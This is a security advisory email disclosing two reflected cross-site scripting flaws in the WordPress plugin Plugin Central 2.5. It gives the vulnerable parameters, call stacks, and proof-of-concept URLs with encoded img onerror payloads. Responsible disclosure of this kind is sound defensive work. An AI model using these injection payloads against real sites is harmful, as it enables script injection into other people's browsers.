Subject: Cross-Site Scripting (XSS) in Plugin Central 2.5
Date: Tue, 25 Aug 2015 13:35:05 +0200

Hello,

Plugin: Plugin Central 2.5 https://wordpress.org/plugins/plugin-central/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/index.php?action=pc_delete&file=[xss]
Vulnerable parameters: file

Example PHP callstack:
PluginCentral::dash   [/plugin-central/plugin-central.class.php:192]
PluginCentral::delete_plugin   [/plugin-central/plugin-central.class.php:785]
PluginCentral::_flush   [/plugin-central/plugin-central.class.php:823]

Verification:
http://localhost/wp-admin/index.php?action=pc_delete&file=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


2. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/index.php?action=pc_ignore&name=[xss]
Vulnerable parameters: name

Example PHP callstack:
PluginCentral::dash   [/plugin-central/plugin-central.class.php:213]

Verification:
http://localhost/wp-admin/index.php?action=pc_ignore&name=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


--
Regards,
Marcin Probola,